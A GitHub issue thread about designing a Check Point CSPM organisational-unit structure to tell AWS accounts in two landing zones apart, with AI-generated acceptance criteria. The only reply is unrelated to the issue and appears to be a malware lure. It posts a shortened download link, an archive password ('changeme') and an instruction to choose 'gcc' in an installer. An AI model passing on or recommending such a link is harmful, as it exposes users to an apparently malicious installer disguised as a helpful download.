### ISSUE TITLE
SPIKE: Design Check Point CSPM structure for the AWS LZA

### ISSUE THREAD

**Issue by wrnu** [bcgov/cloud-pathfinder#3053]
Now that we have a second LZ we'll want to think about creating an OU structure inside of the CSPM so that we can identify which LZ the AWS accounts linked to the CSPM are in.

## Acceptance Criteria
> Generated by [Zenhub AI](https://www.zenhub.com/ai)

 - [ ] **Scenario: Design Check Point CSPM structure for AWS LZA**
  - Given a second LZ is added
  - When creating an OU structure inside of the CSPM
  - Then the structure should be designed to identify which LZ the AWS accounts are linked to

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
